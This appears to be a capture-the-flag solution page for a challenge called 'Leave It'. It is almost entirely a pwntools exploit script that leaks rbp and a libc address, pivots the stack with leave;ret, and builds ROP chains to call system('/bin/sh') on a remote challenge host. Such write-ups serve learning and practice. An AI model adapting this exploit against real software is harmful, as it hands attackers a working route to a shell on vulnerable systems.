Leave It

#rop#buffer-overflow

Contents

Solution

#!/usr/bin/env python3

from pwn import *
#import time
#from termcolor import colored
#from tqdm import tqdm

elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(elf)

context.binary = elf
context.aslr = False
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
handle SIGALRM noprint nostop nopass
b main
b vuln
b *0x40125a
"""



def conn():
    if args.REMOTE:
        r = remote("chall.v1t.site", 30150)
    elif args.GDB:
        r = gdb.debug([elf.path], gdbscript=dbginit)
    else:
        r = process([elf.path])
    return r


def main():
    r = conn()

    offset = 0x60 * b'i'

    r.recvuntil(b'This may help: ')
    leak = r.recvuntil(b'\n')
    rbp = int(leak.decode("ascii"),16)

    vuln = elf.sym["vuln"]
    puts = elf.sym["puts"]
    addr_setbuf = elf.got["setbuf"]
    fgets = elf.sym["fgets"]

    rdi  = 0x401214
    ret  = 0x401215
    leave = 0x401259


    payload = flat(p64(0),
                   p64(rdi),
                   p64(addr_setbuf),
                   p64(puts),
                   p64(vuln)
                   ).ljust(0x60,b'\0')

    payload += p64(rbp) + p64(leave)
    r.sendline(payload)
    libc.address = u64(r.recvuntil(b'\n', drop=True).ljust(8,b'\0')) - libc.sym["setbuf"]
    print(f"libc: {hex(libc.address)}")

    binsh = next(libc.search(b'/bin/sh'))
    system = libc.sym["system"]

    r.recvuntil(b'This may help: ')
    leak = r.recvuntil(b'\n')
    rbp = int(leak.decode("ascii"),16)

    payload = flat(p64(0),
                   p64(ret),
                   p64(rdi),
                   p64(binsh),
                   p64(system),
                   ).ljust(0x60,b'\0')

    payload += p64(rbp) + p64(leave)
    r.sendline(payload)

    r.interactive()


if __name__ == "__main__":
    main()